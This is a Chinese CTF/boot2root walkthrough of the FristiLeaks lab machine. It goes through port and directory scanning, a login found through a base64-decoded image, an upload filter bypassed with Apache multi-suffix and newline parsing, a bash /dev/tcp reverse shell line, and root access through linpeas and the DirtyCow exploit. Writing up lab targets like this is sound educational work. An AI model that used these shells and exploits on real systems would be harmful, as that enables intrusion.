白名单过滤的文件上传如何bypass:boot2root靶机之fristileaks

靶机提示

base64解码提取图片 文件上传之apache多后缀名解析漏洞 linpeas dirtycow提权

靶机下载

通过网盘分享的文件:FristiLeaks_1.3.ova
链接: https://pan.baidu.com/s/1ZWznp8egNGwnQqwh1gkSZg?pwd=wwvp 提取码: wwvp 
--来自百度网盘超级会员v8的分享

主机发现

nmap -sn 192.168.8.0/24

端口扫描

tcp

只开了一个80端口,很少见

nmap -sT --min-rate 10000 -p- 192.168.8.177 

udp

没有开任何端口,看来只能盯着80端口打了

nmap -sU --top-ports=100 192.168.8.177

目录扫描

发现了robots.txt,尝试了一些目录扫描但是都没有发现可以深入的信息

dirb http://192.168.8.177


来点脑洞

ps:个人这边没有想到这个目录,扫了n遍目录,还在考虑图片隐写的问题。。。

提示去找url入口,也就是寻找目标目录,一般来说这个目录就很难用目录扫描出来。联想到首页几个超级大的字母,以及靶机名字,推测出目录为fristi

首页是个

入口

web渗透

查看前端源码
有一个tips,还有用户名

还有一段base64

base64解码提取

echo "iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==" |base64 -d > 1.png

是个图片

尝试登录

eezeepz/keKkeKKeKKeKkEkkEk

成功登录

文件上传漏洞

准备好反弹shell木马

白名单过滤

发现是白名单过滤,这个防护等级是比较高的,一般只有遇到apache几个解析漏洞才能绕过

apache换行解析漏洞

这个漏洞是配置不当导致的

<FilesMatch \.php$>SetHandler application/x-httpd-php
</FilesMatch>
前三行代码:将所有.php结尾的文件当做php文件进行解析。
$:正则表达式匹配字符串结束位置,若存在换行,则匹配换行符为结尾。这导致在上传时,添加一个换行符也能被正常解析,并且能够绕过系统的黑名单检测
利用$和换行符可以绕过黑名单机制。

上传evil.php/x0A,放行数据包,访问上传的文件,要加%0A

apache多后缀解析漏洞
形成原因:配置apache时,对于apache配置不熟练,配置命令不清楚,在配置PHP文件处理程序时,配置命令存在问题:位于漏洞环境目录的 conf/docker-php.conf里的配置命令(AddHandler application/x-httpd-php .php),该命令会将后缀中只要含有.php的文件都会被处理程序解析,这导致攻击者可通过多后缀绕过文件上传限制以.php结尾的机制,并使之被处理程序执行。
上传图片马

我们上传2.php.png,apache服务器看到有php结尾就会解析

访问2.php.png.成功反弹shell

横向渗透

敏感信息搜集

进入用户eezeepz的家目录,发现一个notes文件,提示/tmp有一个定时任务,每分钟执行一次runthis文件里面命令

写入反弹shell命令,但是没有反弹

/bin/bash -i >& /dev/tcp/192.168.8.148/4321 0>&1

脏牛提权

定时任务一直不执行反弹shell的命令,尝试一下linpeas,看看能不能脏牛提权

全称为Linux Privilege Escalation Awesome Script,是⼀个⽤来搜索类unix主机上可能
的提权路径的⾃动化脚本。
Github:https://github.com/carlospolop/privilege-escalation-awesome
scripts-suite/tree/master/linPEAS

攻击机开启文件服务

python -m http.server 8000

靶机下载linpeas.sh

linpeas启动

果然有脏牛提权漏洞

一般用40839.c

传输到靶机上

编译脚本提权

查看脚本用法
head -n 30 40839.c

按部就班提权
gcc -pthread 40839.c -o 40839 -lcrypt./40839 123456su firefart

提权

靶机总结

这台靶机入口找了半天,纯纯ctf脑洞题。。。很难想到入口是fristi,还在那边弄图片隐写,分析了半天。

但是入口进来之后,考了一个比较基础的base64解码;另外还考了一个文件上传的漏洞,这个apache多后缀名解析的漏洞,实战中确实是遇到过的,很有价值

最后提权部分,定时任务一直不能反弹shell,也弄了半天。。。,没有找到原因;但是脏牛提权还是很顺利的,这个技能需要熟练掌握

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/diannao/96529.shtml
繁体地址,请注明出处:http://hk.pswp.cn/diannao/96529.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Centos 8 管理防火墙

firewall-cmd 检查与安装 在 CentOS 8 上安装和启用 firewalld&#xff08;提供 firewall-cmd 工具&#xff09;的步骤如下&#xff1a;1. 检查 **firewalld** 是否已安装 在安装前&#xff0c;先检查系统中是否已安装&#xff1a; sudo firewall-cmd --version如果返回版本号&…

使用PPT进行科研绘图过程中常用的快捷键

PPT科研绘图常用快捷键速查表功能类别快捷键功能描述基础操作与选择Ctrl A全选幻灯片上的所有对象。Ctrl D快速复制选中的对象&#xff0c;并自动保持等间距排列。Shift Click多选多个对象。Ctrl G将选中的多个对象组合成一个整体。Ctrl Shift G取消组合。Ctrl 拖动复制…

`strchr` 字符串查找函数

1) 函数的概念与用途 strchr 是 C 标准库中的一个基础但极其重要的字符串处理函数&#xff0c;它的名字来源于"string chracter"&#xff08;字符串字符&#xff09;。这个函数的功能非常明确&#xff1a;在字符串中查找特定字符的第一次出现位置。 可以将 strchr 想…

Redis 678

Redis 8 是当前的最新稳定版&#xff08;截至 2024 年中&#xff09;&#xff0c;它在 Redis 7 的基础上带来了更多重要改进。我们来对这三个主要版本进行一次全面的功能和性能对比。 核心演进脉络 Redis 6 (2020)&#xff1a;多线程时代的开创者。解决了网络 I/O 瓶颈&#xf…

【大白话解析】 OpenZeppelin 的 Address 库:Solidity安全地址交互工具箱​(附源代码)

🧩 一、这个文件是干嘛的?—— Address.sol 是个“工具箱” 你可以把这个 Address.sol文件理解为一个 ​​“工具箱”​​,里面装了一堆​​专门用来安全地跟别的地址(账户或合约)打交道的工具函数​​。 在区块链世界里,地址(address)可以是: ​​外部账户(EOA)…

漫谈《数字图像处理》之测不准原理

在数字图像处理中&#xff0c;提到的 “测不准原理” &#xff0c;和量子力学里由海森堡提出的 “不确定性原理” &#xff08;Heisenberg uncertainty principle&#xff0c;也叫海森堡测不准原理&#xff09;有一定的类比关系&#xff0c;但本质上并不是同一个概念。以下为详…

Linux服务测试

一、环境准备确认 确保 4 台主机&#xff08;APPSRV、STORAGESRV、ROUTERSRV、CLIENT &#xff09;网络连接正常&#xff0c;虚拟机网卡模式按要求设置&#xff08;APPSRV、STORAGESRV 为 NAT 模式&#xff1b;ROUTERSRV 为双网卡&#xff0c;NAT 仅主机模式&#xff1b;CLIE…

2.Shell脚本修炼手册---创建第一个 Shell 脚本

2. 创建第一个 Shell 脚本 文章目录2. 创建第一个 Shell 脚本2.1 什么是 Shell 脚本&#xff1f;2.1.1 脚本开头&#xff1a;告诉系统用什么程序执行2.1.2 脚本注释&#xff1a;给人看的 “说明书”2.1.3 bash 与 sh 的区别2.2 如何执行 Shell 脚本&#xff1f;方法 1&#xff…

Day22 顺序表与链表的实现及应用(含字典功能与操作对比)

day22 顺序表与链表的实现及应用&#xff08;含字典功能与操作对比&#xff09; 使用顺序表实现查字典功能 支持连续查询单词&#xff0c;输入 #quit 退出程序。数据格式示例如下&#xff1a; a\0 indef art one\r\n word mean [---buf--->] [---i--…

51单片机与stm32单片机,先学习哪一个?

纠结 51 单片机和 STM32 该先学哪个&#xff0c;就像刚学开车的人在自动挡和手动挡之间打转。有人一上来就爱开自动挡&#xff0c;踩着油门就能跑&#xff0c;不用琢磨换挡踩离合的门道&#xff1b;有人偏要从手动挡练起&#xff0c;哪怕起步时熄十几次火&#xff0c;也得搞明白…

DS 0 | 数据结构学习:前言

数据结构是CS最基础、最重要的课程之一在学习数据结构时&#xff0c;通常来讲&#xff0c;学生遇到的难点不在于对数据结构的理解&#xff0c;而在于如何写程序。即编写特定的程序&#xff0c;来实现这些数据结构&#xff0c;特别是如何按照面向对象思想将一个个数据结构设计成…

JVM-(8)JVM启动的常用命令以及参数

JVM启动的常用命令以及参数 在上文 JVM 堆内存逻辑分区 中已经使用过一些 jvm 启动命令&#xff0c;本文着重讲述JVM启动命令用法以及一些常用的参数 一. 基本命令格式 java [options] classname [args...] java [options] -jar filename.jar [args...]① [options] - 命令行…

GO学习记录七——上传/下载文件功能,添加启动运行工具

本来计划是学习Docker部署的&#xff0c;研究了一天没搞出来&#xff0c;得出结论是需要翻墙&#xff0c;懒得弄了&#xff0c;暂时放置。 一、以下是&#xff0c;上传/下载代码&#xff0c;和之前是重复的&#xff0c;只多添加了&#xff0c;上传/下载功能。 测试目录为工程根…

SQL中对视图的操作命令汇总

以下是基于搜索结果整理的SQL视图操作命令汇总&#xff0c;按功能分类说明&#xff1a; 一、创建视图 使用 CREATE VIEW 语句定义视图&#xff0c;需指定视图名称和基础查询表达式&#xff1a; CREATE VIEW view_name AS SELECT column1, column2, ... FROM table_name WHER…

【Spring Cloud 微服务】2.守护神网关Gateway

目录 1.API网关的作用 2.Spring Cloud Gateway 是什么&#xff1f; 3.核心由来与背景 1. 微服务架构的挑战&#xff1a; 2. API 网关模式的兴起&#xff1a; 3. Zuul 的局限性&#xff1a; 4. Spring Cloud Gateway 的诞生&#xff1a; 4.核心特征&#xff1a; 5.核心概…

解读商业智能BI,数据仓库中的元数据

之前的文章讨论过数据分析、数据治理、数据仓库等等&#xff0c;即使是非业内人员从字面意思&#xff0c;也是可以了解一二的&#xff0c;但是&#xff0c;很多人对于元数据可能就比较陌生了。那么&#xff0c;今天我们就来聊一聊元数据管理。数据仓库要说元数据&#xff0c;那…

3 种无误的方式删除 Itel 手机上的短信

如果你希望释放存储空间、保护隐私&#xff0c;或者准备出售或转让手机&#xff0c;删除 Itel 手机上的短信是一个实用的步骤。无论是收件箱中充斥着垃圾短信、过时的对话还是敏感内容&#xff0c;删除不需要的短信可以让你的消息体验更加干净和安全。本文将向你介绍 3 种简单且…

【学习笔记】网络安全专用产品类别与参考标准

一、基本标准 1.1 关键设备 网络关键设备认证依据的强制标准为 GB 40050-2021。 1.2 专用产品 网络安全专用产品认证依据的强制标准为 GB 42250-2022。 二、数据备份与恢复产品标准 相关标准&#xff1a; GB/T 29765-2021《信息安全技术 数据备份与恢复产品技术要求与测试评…

Pytho“张量”(Tensor)和 Java的“向量”(Vector)区别和联系

在Python和Java中&#xff0c;“张量”&#xff08;Tensor&#xff09;和“向量”&#xff08;Vector&#xff09;是两个不同语境下的概念&#xff0c;它们的设计目标、功能和应用场景存在显著差异&#xff0c;但也存在一定的共性。以下从区别和联系两方面详细说明&#xff1a;…

Ubuntu部署K8S集群

Ubuntu部署K8S集群 本例以三台Ubuntu24.04为例,1master节点2worker节点 环境准备 修改hostname,三台服务器分别执行 hostnamectl set-hostname k8s-master01hostnamectl set-hostname k8s-worker01hostnamectl set-hostname k8s-worker02 配置静态ip(不同系统修改方法略微差…